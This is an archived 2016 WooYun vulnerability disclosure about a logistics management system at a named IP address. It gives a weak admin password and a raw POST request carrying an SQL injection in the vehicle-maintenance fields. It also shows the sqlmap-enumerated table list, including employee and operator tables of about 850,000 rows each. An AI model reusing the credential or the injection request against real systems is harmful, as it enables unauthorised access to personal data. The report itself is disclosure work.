乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-23: 细节已通知厂商并且等待厂商处理中 2016-03-23: 厂商已经确认,细节仅向厂商公开 2016-04-02: 细节向核心白帽子及相关领域专家公开 2016-04-12: 细节向普通白帽子公开 2016-04-22: 细节向实习白帽子公开 2016-05-07: 细节向公众公开
弱口令进系统+SQL注入
问题站点:http://211.156.198.57弱口令:ADMIN 888888
在揽收管理---揽收资源--车辆维护处,车牌号和车型字段存在sql注入
POST /clgl/clxxbAction_querypage.action HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded;charset=utf-8X-Requested-With: XMLHttpRequest_eosAjax: xmlencoding: utf-8Referer: http://211.156.198.57/jsp/yzznzd/clgl/clgl_cx.jspAccept-Language: zh-Hans-CN,zh-Hans;q=0.5Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 211.156.198.57Content-Length: 516Proxy-Connection: Keep-AlivePragma: no-cacheCookie: JSESSIONID=xsSdwaOjxEzsIBECirXu1KTyGjTF1ujWibO8ulKxCnlLQyrySC5e!1358030613submitType=2&ajax=<?xml version="1.0" encoding="utf-8"?><root><params><param><key>orgcode</key><value></value></param><param><key>orgcodeOthers</key><value></value></param><param><key>vXjjgbz</key><value>0</value></param><param><key>vCph</key><value>2*</value></param><param><key>vClzt</key><value></value></param><param><key>vCx</key><value>3</value></param></params><data><criteria><_entity></_entity></criteria><page><begin>0</begin><length>10</length><count>-1</count><isCount>true</isCount></page></data></root>
查询抓包到sqlmap中,24库
当前库
Database: YZZNZD+--------------------------+---------+| Table | Entries |+--------------------------+---------+| ZNZD_T_DEV | 22836726 || ZNZD_T_PDADLB | 16248560 || ZHW_T_LOG | 15144408 || ZNZD_T_LTYGPSB | 2771925 || TX_T_CSXXB | 1656479 || AC_OPERATORROLE_BACK | 1453543 || YZTD_T_YJXXB | 1337742 || AC_OPERATORROLE | 1081814 || ZJ_T_ZFCS | 1073134 || OM_EMPORG | 929456 || ZNZD_T_ZDBBXXB | 921485 || ZJ_T_DZYHXX | 896119 || OM_EMPLOYEE | 852420 || AC_OPERATOR | 851572 || ZJ_T_DZYHZDJG | 725500 || ZJ_T_DZYHZDJG_BAK | 705840 || TX_T_CSWJDJB | 617281 || ZNZD_T_ERRLOG | 530825 || ZNZD_T_GXTYSJGB | 379680 || ZNZD_T_CONFIG | 215879 || ZNZD_T_SBXXB | 209276 || T_SYS_LOGINLOG | 181842 || ZNZD_T_PDAXTB | 152364 || YZTD_T_ZQWDJGB | 143809 || YZTD_T_ZQWDJGB_0812 | 136225 || ZHW_T_JGLSGXB | 135240 || TX_T_JSWJXXB | 129743 || OM_ORGANIZATION_20141014 | 124473 || OM_ORGANIZATION | 102608 || YZTD_T_ZQWDJGB_TMP | 98695 || OM_ORGANIZATION_BACK | 93550 || ZJ_T_ZFZTCS | 83168 || TNP_T_YYJGB | 61068 || YZTD_T_ZQWDJGB_1216 | 54853 || ABF_T_YGFJXXB | 37931 || TNP_T_TDJGB | 31757 || YZTD_T_JGQHYB | 26843 || ZNZD_T_SBXXB_BAK | 18574 || YZTD_T_TDJGXZQHDZB | 17579 || ZHW_T_YGB_HBBAK | 14799 || OM_EMPGROUP | 12308 || ZNZD_T_YGUPDATE | 7553 || ABF_T_ZZJGGXSB | 4508 || ABF_T_JGFJXXB | 4175 || ZNZD_T_GGFBJGDYB | 4108 || SYS_EXPORT_SCHEMA_04 | 3526 || SYS_EXPORT_SCHEMA_03 | 3514 || ZNZD_T_GGHFRYDYB | 3479 || SYS_EXPORT_SCHEMA_02 | 3400 || SYS_EXPORT_SCHEMA_01 | 3394 || TAB_BOROUGH | 3177 || TAB_ORGAN | 2774 || ZJ_T_QHYB | 2621 || ZJ_T_GNDM | 2480 || ZNZD_T_GGFBJSDYB | 1972 || ZHW_T_JGB_HBBAK | 1604 || ZNZD_T_TDJGB | 1604 || YZTD_T_PBB | 1334 || OM_PARTYROLE | 1186 || ZNZD_T_LOG | 1011 || TAB_CHYZBM | 949 || OM_GROUPRANGE | 898 || OM_GROUP | 796 || ABF_T_RYKGLJG | 774 || ZNZD_T_GGXXB | 759 || AC_ROLEFUNC | 659 || ZJ_T_ZFZTCS_BAK | 590 || ZHW_T_YGB | 563 || ZNZD_T_JKPZB | 534 || OM_EMPPOSITION | 526 || AC_OPERATOR_JT | 507 || AC_OPERATORROLE_JT | 507 || OM_EMPLOYEE_JT | 507 || OM_EMPORG_JT | 507 || ZNZD_T_GXTYSJGB_JT | 507 || YZTD_T_ZQWDJGB_WUHAN | 449 || ZJ_T_YWCP | 364 || EOS_DICT_ENTRY | 345 || TAB_CITY | 343 || TAB_T_JKPZB | 323 || YZTD_T_PBJHB | 254 || ABF_T_DBSYB | 198 || ZNZD_T_ZQJGYHYSB | 174 || ZNZD_T_BBJGDYB | 157 || EOS_UNIQUE_TABLE | 142 || ZNZD_T_PLQYRYB | 127 || ABF_T_EDUCATION | 122 || EOS_DICT_TYPE | 112 || ZNZD_T_PLQYGPSB | 107 || ZNZD_T_DDJBXXB | 96 || AC_FUNCGROUP | 95 || AC_FUNCTION | 93 || ABF_T_RYKGLJG_BAK | 84 || ZNZD_T_LSRWCBB | 81 || ZNZD_T_ZDBBSJB | 78 || PDA_T_JSQXB | 72 || ZNZD_T_KHXLZXB | 71 || EOS_DICT_ENTRY_I18N | 68 || PDA_T_FUNC | 67 || ZNZD_T_CLXXB | 59 || ZHW_T_JGB | 51 || ZHW_T_JGB_JT | 51 || ZNZD_T_DLXXB | 42 || ZNZD_T_DEFCONF_DEF | 41 || ZNZD_T_PLQYB | 38 || ZNZD_T_KHTSXXB | 33 || ZNZD_T_PLXLB | 32 || TAB_PROVINCE | 31 || ZNZD_T_SJYJYHB | 30 || AC_APPLICATION | 29 || ZNZD_T_PLXLAPB | 28 || ZNZD_T_KHXX | 21 || ZNZD_T_YWCPB | 19 || TX_T_CSPZB | 18 || ZNZD_T_PLYWHZB | 17 || EOS_DICT_TYPE_I18N | 16 || ZHXX_T_TSXXB | 16 || ZNZD_T_KHXXB | 15 || ZNZD_T_PBJHXX | 13 || ZNZD_T_PLPBXXB | 13 || ZNZD_T_WXYHXXB | 13 || TAB_USERMAP | 12 || ZNZD_T_CSXXB | 12 || ZNZD_T_SYSPAGE | 12 || PDA_T_UJS | 11 || AC_ROLE | 10 || PDA_T_UMAP | 10 || OM_EMPLOYEE_SJLS | 9 || PDA_T_ROLE | 8 || PDA_T_USER | 8 || O_ORG | 7 || ABF_T_GGB | 6 || TAB_INTERFACE | 6 || TAB_USER | 6 || EOS_QRTZ_LOCKS | 5 || TAB_T_DICTION | 4 || ABF_T_ZZJGSB | 3 || OM_POSITION | 3 || ZHXX_T_VERSION | 3 || ZNZD_T_DEFCONF | 2 || ABF_T_JGFJZDXXDMB | 1 || EOS_QRTZ_FIRED_TRIGGERS | 1 || EOS_QRTZ_SIMPLE_TRIGGERS | 1 || TAB_TERMINAL | 1 || TDGJ_T_VERSION | 1 || ZNZD_T_DBSYB | 1 || ZNZD_T_DBYSB | 1 |+--------------------------+---------+
OM_EMPLOYEE 852420
AC_OPERATOR 851572
过滤
危害等级:中
漏洞Rank:8
确认时间:2016-03-23 08:19
谢谢。
暂无